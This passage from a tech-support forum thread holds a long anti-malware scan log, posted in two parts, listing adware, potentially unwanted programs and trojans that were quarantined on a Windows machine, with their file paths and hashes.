    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\D6D5.tmp.exe, Quarantined, [dec12a493d5d979ff98efbe415ef59a7],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\76FE.tmp.exe, Quarantined, [eeb1462d2f6b1422a5e213ccd0342cd4],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\76FF.tmp.exe, Quarantined, [1e813043f7a3b77f1671974840c434cc],
    PUP.Optional.Bundler, C:\Users\Administrator\AppData\Local\Temp\fsd88F.exe, Quarantined, [920d680bddbd340262715ac809f7718f],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\C6A5.tmp.exe, Quarantined, [27786d06bbdf1e18285f845b94707090],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\6DB3.tmp.exe, Quarantined, [227d03707d1d6bcbef98a43bc93b9a66],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\02985XYC0\1KE1X4KFP.exe, Quarantined, [009fb8bb44563cfa9308ed0310f4bc44],
    Trojan.KorAd, C:\Users\Administrator\AppData\Local\Temp\06784\KuaiZip_Setup_long_1.exe, Quarantined, [e3bc4d264d4d290da8fbf1ec6d97ff01],
    PUP.Optional.PennyBee, C:\Users\Administrator\AppData\Local\Temp\TJ8BG7P20\TJ8BG7P20.exe, Quarantined, [514eadc606948ea832ee88ef5ea347b9],
    PUP.Optional.PCSpeedUp, C:\Users\Administrator\AppData\Local\Temp\LC9256M0I\Y1FHD6S1I.exe, Quarantined, [a0ff9fd45a402e08e3fbce5ef20f22de],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\NX5ESLKUM\NX5ESLKUM.exe, Quarantined, [18877003bcde3afcbcdf21cf50b412ee],
    Trojan.Downloader, C:\Users\Administrator\AppData\Local\Temp\install_tmp5\inter_mode_323.exe, Quarantined, [851a94df8a109b9bf5583c3f55acef11],
    Trojan.Downloader, C:\Users\Administrator\AppData\Local\Temp\install_tmp8\inter_mode_323.exe, Quarantined, [c8d7a4cfc2d8ea4c08454536ac55c937],
    PUP.Optional.TechAgent, C:\Users\Administrator\AppData\Local\Temp\install_tmp9\thsetup.exe, Quarantined, [aff0264d9dfdcc6ad8cfd30a88793bc5],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\KAW413BJ8\REKQ17732.exe, Quarantined, [e7b8126185153006811a648ccc38f10f],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\V63SOMYVIS\advise.exe, Quarantined, [6936f57e0a908aac3f5cb43c699b33cd],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Local\Temp\QX3K6XCML\QX3K6XCML.exe, Quarantined, [0c93680bc3d72e08444fffe91de76997],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Local\Temp\RarSFX1\LogicHandler.exe, Quarantined, [178875fe9505072f24c87de105fbb24e],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\IA3D9C58Q\IA3D9C58Q.exe, Quarantined, [7d225d166a308fa73a6105eb8282b44c],
    PUP.Optional.SystemHealer, C:\Users\Administrator\AppData\Local\Temp\install_tmp2\SystemHealer.exe, Quarantined, [ddc2b2c1e9b10333e515cc9504fd619f],
    PUP.Optional.TechAgent, C:\Users\Administrator\AppData\Local\Temp\install_tmp3\thsetup.exe, Quarantined, [920d254e306a47efc5e2835a47baf907],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\XRKY0D7CAD\advance.exe, Quarantined, [326ddc97603a55e124771ad629dbae52],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\XRKY0D7CAD\win.exe, Quarantined, [eeb1acc75d3d0432e89ba69b57a9ab55],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\E9YEJEM81\E9YEJEM81.exe, Quarantined, [1689a8cb46543ef80497f6fa43c14eb2],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\DZQXSB5RH1\advise.exe, Quarantined, [2d727cf704967eb85e3d0be5c14357a9],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\34NBZTE26\34NBZTE26.exe, Quarantined, [4b54bab95c3eea4c2b7018d826debf41],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\1NGK2MJI3M\weapprise.exe, Quarantined, [2b74492ab3e74cea92094ea29470817f],
    Trojan.Agent, C:\Users\Administrator\AppData\Local\Temp\4OJE1SW9V\4OJE1SW9V.exe, Quarantined, [ddc2a6cd900a74c26f65eae2c24224dc],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\56NU2ZCLA3\advance.exe, Quarantined, [2f7076fde6b42c0ab9e221cf1be914ec],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\56NU2ZCLA3\win.exe, Quarantined, [603f81f2e0bae254bdc6b19037c96f91],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Local\Temp\E5BQYK8JI\YY5R6MA4B.exe, Quarantined, [b6e9185b5644a19543500ddb2dd738c8],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\FTTHLD4GQ\FTTHLD4GQ.exe, Quarantined, [e3bc79faaaf0d3632378b838f014f40c],
    Trojan.KorAd, C:\Users\Administrator\AppData\Local\Temp\18003\KuaiZip_Setup_long_1.exe, Quarantined, [633cf0835e3c66d0bae9b4297c88936d],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\2NPO81QYC\2NPO81QYC.exe, Quarantined, [049ba3d00397ff372f6c02ee55af3ec2],
    Trojan.Addrop, C:\Windows\Temp\bobca\Deysj.exe, Quarantined, [3a65e2915545d462c10636aaa45dbb45],
    Adware.PennyBee.WnskRST, C:\Windows\Temp\bobca\Guxlew.din, Quarantined, [158ad49f2872b086bf242b87fb066799],
    PUP.Optional.InstallCore, C:\Users\Administrator\Downloads\Firefox_Setup(1).exe, Quarantined, [e1be185b9ffb6acc2249bd7e03fe49b7],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431\qnswAE98.tmp, Quarantined, [2d72096aa4f6ce68bb95b1d7f90805fb],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474227849-5810-8038-B3C04F425431\qnsbFA67.tmp, Quarantined, [78272053a7f342f4aba596f215ece31d],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\bvyvcvd.exe, Quarantined, [3f605a19edad9f976268e4d37f82a759],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\pbqrmvbub, Quarantined, [1c83571c643694a2f8cea512f40d7987],
    PUP.Optional.TempLaunch, C:\Windows\System32\Tasks\Pritc, Quarantined, [2b74db982179af873c09834822e004fc],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\Uninstall.exe, Quarantined, [1e8162110f8b6bcb2aa53f5de61da759],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431\Uninstall.exe, Quarantined, [7d22c5aed7c3f83e04cb673534cf8779],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474227849-5810-8038-B3C04F425431\Uninstall.exe, Quarantined, [4b54a2d1afebb58128a7a6f692718080],
    PUP.Optional.PCSpeedUp, C:\Windows\Tasks\PC SpeedUp Service Deactivator.job, Quarantined, [d2cda1d2e0bab97d3ade8c23847f4db3],
    PUP.Optional.SearchModule, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml, Quarantined, [0c93b3c074262e081a59d2e1907344bc],
    PUP.Optional.SearchModule, C:\Windows\Temp\SM_cache_firefox.exe.cache, Quarantined, [9c03d89bf4a69f979ed87142f50e44bc],
    PUP.Optional.SearchModule, C:\Windows\Temp\SM_cache_iexplore.exe.cache, Quarantined, [257a3241782249edb1c5912231d2da26],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\1.tmp.exe, Quarantined, [405fd79cd4c61f1700abe8d7e51e2ad6],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\2.tmp.exe, Quarantined, [4b54452e2872270fa8037a45cd36c23e],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\3.tmp.exe, Quarantined, [a7f8c0b31b7f2412d3d8ad12b350bf41],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\4.tmp.exe, Quarantined, [4857136045559c9ad6d5e3dcb84bd32d],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\5.tmp.exe, Quarantined, [aef13a390694e74ff4b711ae91729868],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\6.tmp.exe, Quarantined, [d1ce066d4555a49232794b741ce731cf],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\7.tmp.exe, Quarantined, [f4abcea5a3f774c2f4b7dee1af54f808],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\8.tmp.exe, Quarantined, [adf28fe4e3b7c1752d7eab14e32001ff],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\9.tmp.exe, Quarantined, [2e71195ab8e2d2646249ac133ec59c64],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\localStorageIE.txt, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\localStorageIE_backup.txt, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\System Healer Task, Quarantined, [5748f1829efceb4bbceebb1ff90a40c0],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\System HealerPeriod, Quarantined, [1788155e940642f44862b32759aac33d],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\System HealerStartUp, Quarantined, [ccd3680b31693bfb8d1d7f5bb64d639d],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\SystemHealer Monitor, Quarantined, [dac5462d8317181e9e0d954540c3f60a],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\SystemHealer Run Delay, Quarantined, [4e51393a683202345c4ff9e1b94a867a],
    PUP.Optional.SystemHealer, C:\Windows\Tasks\System HealerPeriod.job, Quarantined, [4a559ad905957cba48640dcd20e36898],
    PUP.Optional.SystemHealer, C:\Windows\Tasks\System HealerStartUp.job, Quarantined, [227d056e8119dc5aaa024496020140c0],
    PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, Quarantined, [128de2915d3d8fa7c037bf1e48bb7f81],
    PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb, Quarantined, [d5ca650e7c1e5ed8f9ffdc016f949967],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\1f0ab4e9-4821-0\BIT3192.tmp, Quarantined, [4e51264dbddd66d04875ea0456adb54b],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\1f0ab4e9-7297-1\BIT2A9E.tmp, Quarantined, [f9a6343f46542a0c902d4da12fd45fa1],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\4f8a1888-4c51-1\BIT4477.tmp, Quarantined, [b0ef274ce4b67db9f4c9b7370ff4966a],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\4f8a1888-71e5-0\BIT484E.tmp, Quarantined, [7c236c07d8c256e0ac1140ae38cb14ec],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\ApplicationHosting.dat, Quarantined, [f4ab98dbfe9cca6c9ac2e40b48bb4db3],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\md.xml, Quarantined, [4b54541f12880a2c69f414dba45f2bd5],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\noah.dat, Quarantined, [5a4551229ffb73c39ec0856a659e06fa],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\uninstall_temp.ico, Quarantined, [1f807ef5faa00e2887d84ca3bc473bc5],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\lobby.dat, Quarantined, [a7f8b7bcacee2b0b9e4a945bc1420cf4],
    PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\RankDex.ico, Quarantined, [1d82492acfcb57dffe1e9d57927112ee],
    PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\Zimlam.ico, Quarantined, [1d82492acfcb57dffe1e9d57927112ee],
    PUP.Optional.Linkury.ACMB1, C:\Windows\SysWOW64\findit.xml, Quarantined, [653a3e35eab073c383615c98f40f06fa],
    PUP.Optional.Goobzo, C:\Windows\System32\Tasks\SMW_P, Quarantined, [bee1f083eeac95a1695266915ca724dc],
    PUP.Optional.ProntSpooler, C:\Users\Administrator\AppData\Local\Apps\2.0\abril.InstallState, Quarantined, [f8a78ee58218cf6762029662fa0932ce],
    PUP.Optional.ProntSpooler, C:\Users\Administrator\AppData\Local\Apps\2.0\abril.stt, Quarantined, [0b944f246f2bdf57ee7694649d662cd4],
    PUP.Optional.SearchProtect.Gen, C:\Windows\System32\Tasks\bvyvcvd, Quarantined, [544b97dc4258092d92389762f3106f91],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Freshdinfind.tst, Quarantined, [39667201b8e28caaaf617c810cf7ee12],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Koncom.tst, Quarantined, [e1bec1b24a5046f015fb916c18eb7d83],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Labin.tst, Quarantined, [712e63103169dc5a927eb24b8b78cf31],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Tipair.tst, Quarantined, [faa5e88b6f2b54e2c54b1de06b989967],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Triodom.tst, Quarantined, [e6b95d16f6a476c06ba56895778ce51b],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\VillaStattom.tst, Quarantined, [d9c6db983d5dbf7751bf728bb44fe020],
    PUP.Optional.TTWifi, C:\Windows\System32\Tasks\ttwifi, Quarantined, [7c23f47f7921360089eda45913f009f7],
    PUP.Optional.QuickCleaner, C:\Windows\System32\Tasks\e02c4bd5-54d5-4470-9ea0-a68d88112c00, Quarantined, [9d02f380f0aaf93d8ebf8975d72c05fb],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Web Data, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\cookies, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\cookies-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Web Data-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],

    Part 2 on next post
     
  9. photiost

    photiost Established Techie7 Member

    Here is the continuation:

    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ed8af528d216478d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ee4c595ead6f0ecf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\efa02a86c10a27cf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f0e67edb8824f913_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f1aa716bc380af3a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f1d898c3a0e9d6fa_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f1e2603463a9a9f6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0cf01bdb846bbcbe_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0d7fbcbfbeeb51b1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0e3e71f00aad56a0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0fc3db66b9cbe75d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1083f8644ae8af65_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1220bbb03d8fd989_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\122ad934c6a77f17_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\12ceba5e946ac16e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\12fe5ecbc32823f9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\13132fb448a45aeb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\148144b8a6ad8295_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5873be2f24fe322a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\58f846c580d08c4f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\59ed225ec7cba738_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5a5e109008d01f27_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5b0a89f2fd03a576_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5b66b0a932094293_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5b9855f1e2998482_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5bbbba109e6cd96d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5bc5a103a81099b2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cb6998a072eedcf4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cb6e9679c5963009_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cbc16969752930bb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cc561a192fc11469_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cc8b86efe2b3a659_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cc97024b556575bc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cd0102f2eb06b37d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cd5d17cd2fb16e8d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cd5d17cd2fb16e8d_s, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ce3479bb91b62d90_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ceba8df437e86297_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cf5c1789cfbe7578_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cfa1749b17878519_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cfc521c33f8de168_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d070aea252c695cc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a38957e313e499b1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a4c7dc394a5bc056_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a4df5e95b08c4faf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a54338fe289b5331_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a62c8ffa07eb4a5c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a64d742bdba8cc5b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a665d187b8460f7f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a6b5deb5fbeea87d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a72abca870bfb4ea_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a7f1ebe118e08718_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a80dad84f8bafdb4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a864b348531208ee_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a8a2de219a12dc6a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\339b0479b0e7a381_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\33dd26aedda2bcad_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\35a0963761d24fae_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\35a474499ffb7a33_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\35b9b77a7b019c37_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\35fe7e3bcaa6e65a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\382e79e469c4778e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\38850b67ee8aad01_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\39914334aa98b464_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3bed8bba9a3fc89c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3c51a392d1263bba_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3cbe7399e12438d5_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3de115955206528a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\654f6a219dedbc95_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6578a083b2396cb3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\65f29419fec780d3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\667d00892199be17_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\679aa5ea29b7ba4b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\67c2577d9d1a88ed_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6845a550090aba8d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\68b98d8f12e3a0cb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\68d57ae5d59200af_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1ad7f531dd9d347e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1b5110af07be9699_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1bb4c9ec03ad2b91_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
